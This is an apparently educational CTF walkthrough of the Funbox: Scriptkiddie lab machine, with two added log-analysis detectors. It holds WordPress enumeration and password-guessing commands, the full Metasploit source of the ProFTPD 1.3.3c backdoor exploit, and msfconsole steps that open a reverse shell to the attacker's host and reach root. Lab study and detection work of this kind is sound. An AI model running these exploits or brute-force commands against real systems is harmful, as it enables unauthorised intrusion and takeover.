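Disclaimer: This article documents the walkthrough of the Funbox: Scriptkiddie penetration-testing target machine. All operations were performed in a local, authorized environment. The content is intended only for network security study and defensive research; do not use it for any illegal purpose. Readers should comply with the Cybersecurity Law and related laws and regulations and help maintain the security of cyberspace.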
Environment:
https://download.vulnhub.com/funbox/Funbox11.ova
I. Information gathering
1. Identify the target IP address
arp-scan -l # discover all IP addresses on the current network segment
┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 08:00:27:63:b0:05, IPv4: 192.168.5.11
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.5.1 0a:00:27:00:00:04 (Unknown: locally administered)
192.168.5.2 08:00:27:e0:71:d3 PCS Systemtechnik GmbH
192.168.5.14 08:00:27:99:7a:37 PCS Systemtechnik GmbH
4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.953 seconds (131.08 hosts/sec). 3 responded
nmap -sP 192.168.5.0/24
┌──(root㉿kali)-[~]
└─# nmap -sP 192.168.5.0/24
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-11 08:29 -0400
Nmap scan report for 192.168.5.1
Host is up (0.00023s latency).
MAC Address: 0A:00:27:00:00:04 (Unknown)
Nmap scan report for 192.168.5.2
Host is up (0.00019s latency).
MAC Address: 08:00:27:E0:71:D3 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.5.14
Host is up (0.00039s latency).
MAC Address: 08:00:27:99:7A:37 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.5.11
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 3.01 seconds
Target IP: 192.168.5.14
2. Scan the target's open ports
nmap -sV -p- 192.168.5.14
┌──(root㉿kali)-[~]
└─# nmap -sV -p- 192.168.5.14
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-11 08:29 -0400
Nmap scan report for 192.168.5.14
Host is up (0.000078s latency).
Not shown: 65527 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.3c
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
25/tcp open smtp Postfix smtpd
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
110/tcp open pop3 Dovecot pop3d
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
MAC Address: 08:00:27:99:7A:37 (Oracle VirtualBox virtual NIC)
Service Info: Hosts: funbox11, FUNBOX11; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Ports: 21, 22, 25, 80, 110, 139, 143, 445
3. Directory enumeration
dirsearch -u http://192.168.5.14
┌──(root㉿kali)-[~]
└─# dirsearch -u http://192.168.5.14
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460
Output File: /root/reports/http_192.168.5.14/_26-03-11_08-31-29.txt
Target: http://192.168.5.14/
[08:31:29] Starting:
[08:31:31] 403 - 277B - /.ht_wsr.txt
[08:31:31] 403 - 277B - /.htaccess.bak1
[08:31:31] 403 - 277B - /.htaccess.orig
[08:31:31] 403 - 277B - /.htaccess.sample
[08:31:31] 403 - 277B - /.htaccess.save
[08:31:31] 403 - 277B - /.htaccess_extra
[08:31:31] 403 - 277B - /.htaccess_orig
[08:31:31] 403 - 277B - /.htaccessBAK
[08:31:31] 403 - 277B - /.htaccess_sc
[08:31:31] 403 - 277B - /.htaccessOLD
[08:31:31] 403 - 277B - /.htaccessOLD2
[08:31:31] 403 - 277B - /.html
[08:31:31] 403 - 277B - /.htm
[08:31:31] 403 - 277B - /.htpasswd_test
[08:31:31] 403 - 277B - /.httr-oauth
[08:31:31] 403 - 277B - /.htpasswds
[08:31:31] 403 - 277B - /.php
[08:31:31] 403 - 277B - /.php3
[08:31:48] 301 - 0B - /index.php -> http://192.168.5.14/
[08:31:49] 404 - 8KB - /index.php/login/
[08:31:50] 200 - 7KB - /license.txt
[08:31:58] 200 - 3KB - /readme.html
[08:31:59] 403 - 277B - /server-status
[08:31:59] 403 - 277B - /server-status/
[08:32:07] 301 - 315B - /wp-admin -> http://192.168.5.14/wp-admin/
[08:32:07] 200 - 0B - /wp-config.php
[08:32:07] 302 - 0B - /wp-admin/ -> http://funbox11/wp-login.php?redirect_to=http%3A%2F%2F192.168.5.14%2Fwp-admin%2F&reauth=1
[08:32:07] 400 - 1B - /wp-admin/admin-ajax.php
[08:32:07] 200 - 507B - /wp-admin/install.php
[08:32:07] 409 - 3KB - /wp-admin/setup-config.php
[08:32:07] 301 - 317B - /wp-content -> http://192.168.5.14/wp-content/
[08:32:07] 200 - 0B - /wp-content/
[08:32:07] 200 - 84B - /wp-content/plugins/akismet/akismet.php
[08:32:07] 500 - 0B - /wp-content/plugins/hello.php
[08:32:07] 200 - 478B - /wp-content/uploads/
[08:32:07] 200 - 416B - /wp-content/upgrade/
[08:32:07] 301 - 318B - /wp-includes -> http://192.168.5.14/wp-includes/
[08:32:07] 200 - 0B - /wp-includes/rss-functions.php
[08:32:07] 200 - 4KB - /wp-includes/
[08:32:07] 200 - 0B - /wp-cron.php
[08:32:07] 200 - 2KB - /wp-login.php
[08:32:07] 302 - 0B - /wp-signup.php -> http://funbox11/wp-login.php?action=register
[08:32:08] 405 - 42B - /xmlrpc.php
Task Completed
dirb http://192.168.5.14
┌──(root㉿kali)-[~]
└─# dirb http://192.168.5.14
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Mar 11 08:33:12 2026
URL_BASE: http://192.168.5.14/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.5.14/ ----
+ http://192.168.5.14/index.php (CODE:301|SIZE:0)
+ http://192.168.5.14/server-status (CODE:403|SIZE:277)
==> DIRECTORY: http://192.168.5.14/wp-admin/
==> DIRECTORY: http://192.168.5.14/wp-content/
==> DIRECTORY: http://192.168.5.14/wp-includes/
+ http://192.168.5.14/xmlrpc.php (CODE:405|SIZE:42)
---- Entering directory: http://192.168.5.14/wp-admin/ ----
+ http://192.168.5.14/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.5.14/wp-admin/css/
==> DIRECTORY: http://192.168.5.14/wp-admin/images/
==> DIRECTORY: http://192.168.5.14/wp-admin/includes/
+ http://192.168.5.14/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.5.14/wp-admin/js/
==> DIRECTORY: http://192.168.5.14/wp-admin/maint/
==> DIRECTORY: http://192.168.5.14/wp-admin/network/
==> DIRECTORY: http://192.168.5.14/wp-admin/user/
---- Entering directory: http://192.168.5.14/wp-content/ ----
+ http://192.168.5.14/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.5.14/wp-content/languages/
==> DIRECTORY: http://192.168.5.14/wp-content/plugins/
==> DIRECTORY: http://192.168.5.14/wp-content/themes/
==> DIRECTORY: http://192.168.5.14/wp-content/upgrade/
==> DIRECTORY: http://192.168.5.14/wp-content/uploads/
---- Entering directory: http://192.168.5.14/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.5.14/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.5.14/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.5.14/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.5.14/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.5.14/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.5.14/wp-admin/network/ ----
+ http://192.168.5.14/wp-admin/network/admin.php (CODE:302|SIZE:0)
+ http://192.168.5.14/wp-admin/network/index.php (CODE:302|SIZE:0)
---- Entering directory: http://192.168.5.14/wp-admin/user/ ----
+ http://192.168.5.14/wp-admin/user/admin.php (CODE:302|SIZE:0)
+ http://192.168.5.14/wp-admin/user/index.php (CODE:302|SIZE:0)
---- Entering directory: http://192.168.5.14/wp-content/languages/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.5.14/wp-content/plugins/ ----
+ http://192.168.5.14/wp-content/plugins/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.5.14/wp-content/themes/ ----
+ http://192.168.5.14/wp-content/themes/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.5.14/wp-content/upgrade/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.5.14/wp-content/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Wed Mar 11 08:33:20 2026
DOWNLOADED: 32284 - FOUND: 12
gobuster dir -u http://192.168.5.14 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php
┌──(root㉿kali)-[~]
└─# gobuster dir -u http://192.168.5.14 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.5.14
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Extensions: php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/wp-content (Status: 301) [Size: 317] [--> http://192.168.5.14/wp-content/]
/index.php (Status: 301) [Size: 0] [--> http://192.168.5.14/]
/wp-includes (Status: 301) [Size: 318] [--> http://192.168.5.14/wp-includes/]
/wp-login.php (Status: 200) [Size: 7339]
/wp-trackback.php (Status: 200) [Size: 135]
/wp-admin (Status: 301) [Size: 315] [--> http://192.168.5.14/wp-admin/]
/xmlrpc.php (Status: 405) [Size: 42]
/wp-signup.php (Status: 302) [Size: 0] [--> http://funbox11/wp-login.php?action=register]
/server-status (Status: 403) [Size: 277]
Progress: 441116 / 441116 (100.00%)
===============================================================
Finished
===============================================================
II. Exploitation
1. Information gathering
192.168.5.14
On the home page, click MOUNT FUJI!
The target machine's description tells us to add a hostname entry:
Description
As always, it’s a very easy box for beginners.
Add to your /etc/hosts: funbox11
This works better with VirtualBox rather than VMware.
192.168.5.14 funbox11
2. Scanning with WPScan
wpscan --url http://funbox11/ --enumerate u
┌──(root㉿kali)-[~]
└─# wpscan --url http://funbox11/ --enumerate u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.28
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://funbox11/ [192.168.5.14]
[+] Started: Wed Mar 11 08:49:05 2026
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://funbox11/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://funbox11/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://funbox11/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://funbox11/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.7.2 identified (Insecure, released on 2021-05-12).
| Found By: Rss Generator (Passive Detection)
| - http://funbox11/index.php/feed/, <generator>https://wordpress.org/?v=5.7.2</generator>
| - http://funbox11/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.7.2</generator>
[+] WordPress theme in use: block-lite
| Location: http://funbox11/wp-content/themes/block-lite/
| Last Updated: 2022-05-30T00:00:00.000Z
| Readme: http://funbox11/wp-content/themes/block-lite/README.txt
| [!] The version is out of date, the latest version is 1.3
| Style URL: http://funbox11/wp-content/themes/block-lite/style.css?ver=5.7.2
| Style Name: Block Lite
| Style URI: https://organicthemes.com/theme/block-lite/
| Description: The Block Lite theme features a modern and responsive design with a block style layout for blog post...
| Author: Organic Themes
| Author URI: https://organicthemes.com
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.2.2 (80% confidence)
| Found By: Style (Passive Detection)
| - http://funbox11/wp-content/themes/block-lite/style.css?ver=5.7.2, Match: 'Version: 1.2.2'
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <==========> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] admin
| Found By: Rss Generator (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://funbox11/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Wed Mar 11 08:49:09 2026
[+] Requests Done: 54
[+] Cached Requests: 6
[+] Data Sent: 12.984 KB
[+] Data Received: 192.543 KB
[+] Memory used: 189.039 MB
[+] Elapsed time: 00:00:03
This yields the user admin.
3. Password enumeration
wpscan --url http://funbox11/ --passwords /usr/share/wordlists/rockyou.txt --usernames admin
Enumeration failed.
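Seen from the web server's side, the WPScan user enumeration and password guessing above leave a recognisable pattern in the Apache access log. The following is an added example, not part of the original walkthrough: it flags REST user listing, author-ID probing and bursts of login POSTs. The log lines are constructed, 192.168.5.20 is a made-up ordinary visitor, and the thresholds are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-format lines (not captured from the target).
SAMPLE_LOG = """\
192.168.5.11 - - [11/Mar/2026:08:49:05 -0400] "GET /?author=1 HTTP/1.1" 301 0 "-" "-"
192.168.5.11 - - [11/Mar/2026:08:49:05 -0400] "GET /?author=2 HTTP/1.1" 404 8192 "-" "-"
192.168.5.11 - - [11/Mar/2026:08:49:05 -0400] "GET /?author=3 HTTP/1.1" 404 8192 "-" "-"
192.168.5.11 - - [11/Mar/2026:08:49:06 -0400] "GET /index.php/wp-json/wp/v2/users/?per_page=100&page=1 HTTP/1.1" 200 512 "-" "-"
192.168.5.11 - - [11/Mar/2026:08:52:00 -0400] "POST /wp-login.php HTTP/1.1" 200 7339 "-" "-"
192.168.5.11 - - [11/Mar/2026:08:52:01 -0400] "POST /wp-login.php HTTP/1.1" 200 7339 "-" "-"
192.168.5.11 - - [11/Mar/2026:08:52:02 -0400] "POST /wp-login.php HTTP/1.1" 200 7339 "-" "-"
192.168.5.11 - - [11/Mar/2026:08:52:03 -0400] "POST /wp-login.php HTTP/1.1" 200 7339 "-" "-"
192.168.5.11 - - [11/Mar/2026:08:52:04 -0400] "POST /wp-login.php HTTP/1.1" 200 7339 "-" "-"
192.168.5.20 - - [11/Mar/2026:09:00:00 -0400] "GET /?author=1 HTTP/1.1" 301 0 "-" "-"
192.168.5.20 - - [11/Mar/2026:09:00:10 -0400] "POST /wp-login.php HTTP/1.1" 200 7339 "-" "-"
192.168.5.20 - - [11/Mar/2026:09:00:25 -0400] "POST /wp-login.php HTTP/1.1" 302 0 "-" "-"
"""

LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def parse(line):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    return {"ip": m["ip"], "method": m["method"], "status": int(m["status"]),
            "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
            "path": url.path, "query": parse_qs(url.query)}

def detect(lines, min_author_ids=3, max_login_posts=5, window=timedelta(seconds=60)):
    """Return sorted (ip, finding) pairs; thresholds are assumed defaults."""
    author_ids = defaultdict(set)  # ip -> distinct ?author=N values requested
    rest_users = set()             # ips that listed users through the REST API
    logins = defaultdict(list)     # ip -> timestamps of probable login attempts
    for entry in filter(None, map(parse, lines)):
        ip = entry["ip"]
        if entry["path"].rstrip("/").endswith("/wp-json/wp/v2/users"):
            rest_users.add(ip)
        for value in entry["query"].get("author", []):
            if value.isdigit():
                author_ids[ip].add(int(value))
        # Heuristic: a failed form login answers 200, a successful one redirects (302).
        failed_form = entry["path"] == "/wp-login.php" and entry["status"] == 200
        if entry["method"] == "POST" and (failed_form or entry["path"] == "/xmlrpc.php"):
            logins[ip].append(entry["ts"])
    alerts = [(ip, "user-enum-rest") for ip in sorted(rest_users)]
    alerts += [(ip, "user-enum-author-id") for ip, ids in sorted(author_ids.items())
               if len(ids) >= min_author_ids]
    for ip, stamps in sorted(logins.items()):
        stamps.sort()
        start = 0
        for end in range(len(stamps)):  # sliding window over attempt times
            while stamps[end] - stamps[start] > window:
                start += 1
            if end - start + 1 >= max_login_posts:
                alerts.append((ip, "login-guessing"))
                break
    return alerts

if __name__ == "__main__":
    for ip, finding in detect(SAMPLE_LOG.splitlines()):
        print(ip, finding)
```

The visitor at 192.168.5.20 follows one author link and mistypes a password once, so it stays below every threshold.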
4. ProFTPD 1.3.3c backdoor command execution vulnerability
searchsploit ProFTPD 1.3.3c
searchsploit -m 16921.rb
cat 16921.rb
┌──(root㉿kali)-[~]
└─# searchsploit ProFTPD 1.3.3c
------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------ ---------------------------------
ProFTPd 1.3.3c - Compromised Source Backdoor Remote C | linux/remote/15662.txt
ProFTPd-1.3.3c - Backdoor Command Execution (Metasplo | linux/remote/16921.rb
------------------------------------------------------ ---------------------------------
Shellcodes: No Results
┌──(root㉿kali)-[~]
└─# searchsploit -m 16921.rb
Exploit: ProFTPd-1.3.3c - Backdoor Command Execution (Metasploit)
URL: https://www.exploit-db.com/exploits/16921
Path: /usr/share/exploitdb/exploits/linux/remote/16921.rb
Codes: OSVDB-69562
Verified: True
File Type: Ruby script, ASCII text
Copied to: /root/16921.rb
┌──(root㉿kali)-[~]
└─# cat 16921.rb
##
# $Id: proftpd_133c_backdoor.rb 11214 2010-12-03 12:34:38Z swtornio $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Ftp

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'ProFTPD-1.3.3c Backdoor Command Execution',
      'Description' => %q{
        This module exploits a malicious backdoor that was added to the
        ProFTPD download archive. This backdoor was present in the proftpd-1.3.3c.tar.[bz2|gz]
        archive between November 28th 2010 and 2nd December 2010.
      },
      'Author' => [ 'MC', 'darkharper2' ],
      'License' => MSF_LICENSE,
      'Version' => '$Revision: 11214 $',
      'References' =>
        [
          [ 'OSVDB', '69562'],
          [ 'BID', '45150' ],
          [ 'URL', 'http://sourceforge.net/mailarchive/message.php?msg_name=alpine.DEB.2.00.1012011542220.12930%40familiar.castaglia.org' ],
        ],
      'Privileged' => true,
      'Platform' => [ 'unix' ],
      'Arch' => ARCH_CMD,
      'Payload' =>
        {
          'Space' => 2000,
          'BadChars' => '',
          'DisableNops' => true,
          'Compat' =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic perl telnet',
            }
        },
      'Targets' =>
        [
          [ 'Automatic', { } ],
        ],
      'DisclosureDate' => 'Dec 2 2010',
      'DefaultTarget' => 0))

    deregister_options('FTPUSER', 'FTPPASS')
  end

  def exploit
    connect

    print_status("Sending Backdoor Command")
    sock.put("HELP ACIDBITCHEZ\r\n")

    res = sock.get_once(-1,10)

    if ( res and res =~ /502/ )
      print_error("Not backdoored")
    else
      sock.put("nohup " + payload.encoded + " >/dev/null 2>&1\n")
      handler
    end

    disconnect
  end
end
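The module above shows what the backdoor looks like on the wire: a fixed HELP argument on the FTP control channel, then either a 502 reply (the module's "Not backdoored" branch) or raw shell input with no FTP reply. The following is an added detection example, not part of the original walkthrough or of Metasploit: it classifies FTP control sessions from a transcript. The `<session> <C|S> <line>` record format, the session ids and the sample transcript are constructed assumptions.

```python
import re
from collections import defaultdict

TRIGGER = "HELP ACIDBITCHEZ"          # string sent by the module shown above
REPLY_RE = re.compile(r"^(\d{3})[ -]")  # FTP reply: three digits, then space or '-'

# Constructed control-channel transcript: "<session> <C|S> <line>".
SAMPLE_TRANSCRIPT = """\
s1 S 220 ProFTPD 1.3.3c Server (constructed banner)
s1 C USER anonymous
s1 S 331 Anonymous login ok, send your complete email address as your password
s1 C HELP
s1 S 214 Direct comments to root@localhost
s1 C QUIT
s1 S 221 Goodbye.
s2 S 220 ProFTPD 1.3.3c Server (constructed banner)
s2 C HELP ACIDBITCHEZ
s2 S 502 Unknown command 'ACIDBITCHEZ'
s3 S 220 ProFTPD 1.3.3c Server (constructed banner)
s3 C HELP ACIDBITCHEZ
s3 C nohup <command elided> >/dev/null 2>&1
"""

VERDICTS = {
    "normal": "clean",
    "rejected": "probe-rejected",            # server answered 502: not backdoored
    "awaiting-reply": "backdoor-suspected",  # trigger sent, no FTP reply captured
    "suspected": "backdoor-suspected",       # non-FTP traffic followed the trigger
}

def analyse(transcript):
    """Map each session id to a verdict plus the client lines sent after the trigger."""
    state = defaultdict(lambda: {"phase": "normal", "evidence": []})
    for record in transcript.strip().splitlines():
        sid, direction, payload = record.split(" ", 2)
        session = state[sid]
        if direction == "C":
            if payload.strip().upper() == TRIGGER:
                session["phase"] = "awaiting-reply"
            elif session["phase"] in ("awaiting-reply", "suspected"):
                # Client kept sending without an FTP reply in between:
                # on a backdoored daemon this is shell input, keep it as evidence.
                session["phase"] = "suspected"
                session["evidence"].append(payload)
        elif session["phase"] == "awaiting-reply":
            reply = REPLY_RE.match(payload)
            rejected = reply is not None and reply.group(1) == "502"
            session["phase"] = "rejected" if rejected else "suspected"
    return {sid: {"verdict": VERDICTS[s["phase"]], "evidence": s["evidence"]}
            for sid, s in state.items()}

if __name__ == "__main__":
    for sid, result in analyse(SAMPLE_TRANSCRIPT).items():
        print(sid, result["verdict"], result["evidence"])
```

A "probe-rejected" session still deserves attention as a scan, and the 1.3.3c banner alone does not show whether a daemon was built from the tampered archive; the reply to the trigger does.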
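5. Exp
# Start the Metasploit Framework command-line interface
msfconsole
# Select the exploit module for the ProFTPD 1.3.3c backdoor
use exploit/unix/ftp/proftpd_133c_backdoor
# Set the target host IP address (victim)
set rhost 192.168.5.14
# Set the payload to a Unix command reverse shell
set payload payload/cmd/unix/reverse
# Set the local host IP address (attacker's listening IP)
set lhost 192.168.5.11
# Run the exploit
exploit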
┌──(root㉿kali)-[~]
└─# msfconsole
Metasploit tip: Metasploit can be configured at startup, see msfconsole
--help to learn more
.:okOOOkdc' 'cdkOOOko:.
.xOOOOOOOOOOOOc cOOOOOOOOOOOOx.
:OOOOOOOOOOOOOOOk, ,kOOOOOOOOOOOOOOO:
'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'
oOOOOOOOO.MMMM.oOOOOoOOOOl.MMMM,OOOOOOOOo
dOOOOOOOO.MMMMMM.cOOOOOc.MMMMMM,OOOOOOOOx
lOOOOOOOO.MMMMMMMMM;d;MMMMMMMMM,OOOOOOOOl
.OOOOOOOO.MMM.;MMMMMMMMMMM;MMMM,OOOOOOOO.
cOOOOOOO.MMM.OOc.MMMMM'oOO.MMM,OOOOOOOc
oOOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOOo
lOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOl
;OOOO'MMM.OOOO.MMM:OOOO.MMM;OOOO;
.dOOo'WM.OOOOocccxOOOO.MX'xOOd.
,kOl'M.OOOOOOOOOOOOO.M'dOk,
:kk;.OOOOOOOOOOOOO.;Ok:
;kOOOOOOOOOOOOOOOk:
,xOOOOOOOOOOOx,
.lOOOOOOOl.
,dOd,
.
=[ metasploit v6.4.103-dev ]
+ -- --=[ 2,584 exploits - 1,319 auxiliary - 1,694 payloads ]
+ -- --=[ 433 post - 49 encoders - 14 nops - 9 evasion ]
Metasploit Documentation: https://docs.metasploit.com/
The Metasploit Framework is a Rapid7 Open Source Project
msf > use exploit/unix/ftp/proftpd_133c_backdoor
msf exploit(unix/ftp/proftpd_133c_backdoor) > set rhost 192.168.5.14
rhost => 192.168.5.14
msf exploit(unix/ftp/proftpd_133c_backdoor) >
msf exploit(unix/ftp/proftpd_133c_backdoor) > set payload payload/cmd/unix/reverse
payload => cmd/unix/reverse
msf exploit(unix/ftp/proftpd_133c_backdoor) >
msf exploit(unix/ftp/proftpd_133c_backdoor) > set lhost 192.168.5.11
lhost => 192.168.5.11
msf exploit(unix/ftp/proftpd_133c_backdoor) >
msf exploit(unix/ftp/proftpd_133c_backdoor) > exploit
[*] Started reverse TCP double handler on 192.168.5.11:4444
[*] 192.168.5.14:21 - Sending Backdoor Command
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo DlOaSFpWZByPVTk9;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "DlOaSFpWZByPVTk9\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (192.168.5.11:4444 -> 192.168.5.14:44482) at 2026-03-11 08:56:35 -0400
id
uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
whoami
root
cd /root
ls
root.txt
cat root.txt
$$$$$$$$\ $$\
$$ _____| $$ |
$$ | $$\ $$\ $$$$$$$\ $$$$$$$\ $$$$$$\ $$\ $$\ $$\
$$$$$\ $$ | $$ |$$ __$$\ $$ __$$\ $$ __$$\ \$$\ $$ |\__|
$$ __|$$ | $$ |$$ | $$ |$$ | $$ |$$ / $$ | \$$$$ /
$$ | $$ | $$ |$$ | $$ |$$ | $$ |$$ | $$ | $$ $$< $$\
$$ | \$$$$$$ |$$ | $$ |$$$$$$$ |\$$$$$$ |$$ /\$$\ \__|
\__| \______/ \__| \__|\_______/ \______/ \__/ \__|
$$$$$$\ $$\ $$\ $$\ $$\ $$\ $$\ $$\
$$ __$$\ \__| $$ | $$ | \__| $$ | $$ |\__|
$$ / \__| $$$$$$$\ $$$$$$\ $$\ $$$$$$\ $$$$$$\ $$ | $$\ $$\ $$$$$$$ | $$$$$$$ |$$\ $$$$$$\
\$$$$$$\ $$ _____|$$ __$$\ $$ |$$ __$$\\_$$ _| $$ | $$ |$$ |$$ __$$ |$$ __$$ |$$ |$$ __$$\
\____$$\ $$ / $$ | \__|$$ |$$ / $$ | $$ | $$$$$$ / $$ |$$ / $$ |$$ / $$ |$$ |$$$$$$$$ |
$$\ $$ |$$ | $$ | $$ |$$ | $$ | $$ |$$\ $$ _$$< $$ |$$ | $$ |$$ | $$ |$$ |$$ ____|
\$$$$$$ |\$$$$$$$\ $$ | $$ |$$$$$$$ | \$$$$ |$$ | \$$\ $$ |\$$$$$$$ |\$$$$$$$ |$$ |\$$$$$$$\
\______/ \_______|\__| \__|$$ ____/ \____/ \__| \__|\__| \_______| \_______|\__| \_______|
$$ |
$$ |
\__|
Please, tweet this to: @0815R2d2
Thank you...
After successfully obtaining root privileges, the flag is in **root.txt** in the /root directory.
id
whoami
cd /root
ls
cat root.txt
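The techniques described in this article apply only to authorized test environments or legitimate CTF competitions. Do not test any system without authorization. The road to security begins with compliance and ends with responsibility.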